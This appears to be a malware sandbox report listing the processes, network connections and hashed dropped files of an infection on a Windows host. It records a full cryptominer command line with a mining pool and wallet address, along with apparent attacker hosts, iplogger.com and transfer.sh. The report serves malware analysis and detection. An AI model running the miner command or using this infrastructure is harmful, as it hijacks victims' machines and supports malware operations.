C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1260 -ip 1260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 204

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2020 -ip 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 552

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4120 -ip 4120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 200

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6529.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,14272056013615953310,15064814789335462676,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,14272056013615953310,15064814789335462676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\7353.exe

C:\Users\Admin\AppData\Local\Temp\7353.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\77B9.exe

C:\Users\Admin\AppData\Local\Temp\77B9.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\8343.exe

C:\Users\Admin\AppData\Local\Temp\8343.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\ss41.exe

"C:\Users\Admin\AppData\Local\Temp\ss41.exe"

C:\Users\Admin\AppData\Local\Temp\kos1.exe

"C:\Users\Admin\AppData\Local\Temp\kos1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\8F59.exe

C:\Users\Admin\AppData\Local\Temp\8F59.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\kos.exe

"C:\Users\Admin\AppData\Local\Temp\kos.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp" /SL4 $601DC "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1232936 52224

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 8

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 8

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -s

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=8F59.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=8F59.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6997176924742542117,14958213130455465269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RBvfugTGdvfZCHCgvSoHZdsYt2u1JwYhUP.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 126.23.238.8.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.61:80 77.91.68.61 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 61.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.68.78:80 77.91.68.78 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 78.68.91.77.in-addr.arpa udp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
MD 176.123.9.85:16482 tcp
US 8.8.8.8:53 85.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
NL 141.98.6.38:39001 tcp
US 8.8.8.8:53 38.6.98.141.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 183.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
IE 63.34.77.44:443 mscom.demdex.net tcp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 44.77.34.63.in-addr.arpa udp
US 8.8.8.8:53 mdec.nelreports.net udp
NL 23.72.252.74:443 mdec.nelreports.net tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
AU 104.46.162.226:443 browser.events.data.microsoft.com tcp
AU 104.46.162.226:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 74.252.72.23.in-addr.arpa udp
AU 104.46.162.226:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp
AU 104.46.162.226:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
US 165.227.182.82:3333 rx.unmineable.com tcp
US 8.8.8.8:53 82.182.227.165.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

MD5 20f5d2c0d83c83fda09c94bafca3ac57
SHA1 e3530e21582e28f77bd2b6a619fec40ab813cdfc
SHA256 265c4635375c6151612d8b528d8f3f9b4e588a65347390011949acaf28c113d9
SHA512 5f26aaefc8451eeb6633ae8fe9afb26407c3a86932888b3d21a9dbf8e4103bdf1256d0ef872a4840bf57e106d98ea3f5cc1a0ae36dfa628a0f9e6f96d8c74ba2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

MD5 20f5d2c0d83c83fda09c94bafca3ac57
SHA1 e3530e21582e28f77bd2b6a619fec40ab813cdfc
SHA256 265c4635375c6151612d8b528d8f3f9b4e588a65347390011949acaf28c113d9
SHA512 5f26aaefc8451eeb6633ae8fe9afb26407c3a86932888b3d21a9dbf8e4103bdf1256d0ef872a4840bf57e106d98ea3f5cc1a0ae36dfa628a0f9e6f96d8c74ba2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

MD5 a2a531625c2c5da94c53780e5746089b
SHA1 e23e81152ec16a75df0d25f8fa52e30e0d791115
SHA256 0530e0518fcb4e4838c3446e59ab046a41ab75f217562f02214dfa9d0d18b1a2
SHA512 472cde38781df8cdecd8ba363e8338328c774e87ded96c13a10a2ac8003dc2d3bfe5338b34ffb98c680f60e05e9b14037c8a05643d68331e50d32f0a07a15745

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

MD5 a2a531625c2c5da94c53780e5746089b
SHA1 e23e81152ec16a75df0d25f8fa52e30e0d791115
SHA256 0530e0518fcb4e4838c3446e59ab046a41ab75f217562f02214dfa9d0d18b1a2
SHA512 472cde38781df8cdecd8ba363e8338328c774e87ded96c13a10a2ac8003dc2d3bfe5338b34ffb98c680f60e05e9b14037c8a05643d68331e50d32f0a07a15745

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

MD5 579b05121ab299911b57e475876aae4e
SHA1 3b172c56374c012574cd2524a6de6a70eecc5f4a
SHA256 f19359629bc7890e780b8c3023082f06e097e144998225a1cc218fa0e6bcaf7c
SHA512 9a277230c2d9d37a752fe9a573b6c48d41422b3b012a380f98578fef792b9e8863c9365192ec45f08260a0c4755ec30fd6dff64c1092f7c377fdaf573364e276

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

MD5 579b05121ab299911b57e475876aae4e
SHA1 3b172c56374c012574cd2524a6de6a70eecc5f4a
SHA256 f19359629bc7890e780b8c3023082f06e097e144998225a1cc218fa0e6bcaf7c
SHA512 9a277230c2d9d37a752fe9a573b6c48d41422b3b012a380f98578fef792b9e8863c9365192ec45f08260a0c4755ec30fd6dff64c1092f7c377fdaf573364e276

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

MD5 27155b95c9a4b978156611978d662313
SHA1 268ce015bd578fbb578337ae9290c53e8369f479
SHA256 46eb226f43c2bc6543cf66ad5e4b4e3ff7769994895156262919343f1ca1c6d2
SHA512 6a7a40a8f40af0d8a3c44e666f5dc2e8bd37e213132007dab6ef9f8b052395117ef1be955499764957a74214448f16962928368ac819ac392eceb0bc23e72c34

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

MD5 27155b95c9a4b978156611978d662313
SHA1 268ce015bd578fbb578337ae9290c53e8369f479
SHA256 46eb226f43c2bc6543cf66ad5e4b4e3ff7769994895156262919343f1ca1c6d2
SHA512 6a7a40a8f40af0d8a3c44e666f5dc2e8bd37e213132007dab6ef9f8b052395117ef1be955499764957a74214448f16962928368ac819ac392eceb0bc23e72c34

memory/3800-28-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3800-29-0x0000000073B50000-0x0000000074300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

MD5 ab34412b71b2df65258009f79f00571d
SHA1 f1bdfb7b3a557011c8188ef45c7eb97f3888e146
SHA256 e7eccc78e8cab1c1979c6e613e984034c9859ecc36d1499de77d752e96e62b70
SHA512 88368c54b9a5c82fc5982b2a775a547da99fd9386f9c710028bd3b523c1f9ee4bcd77a44d6e56dd14d25a2ab88f9a1310386ea60b58d81a5b6d545e3004a1611

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

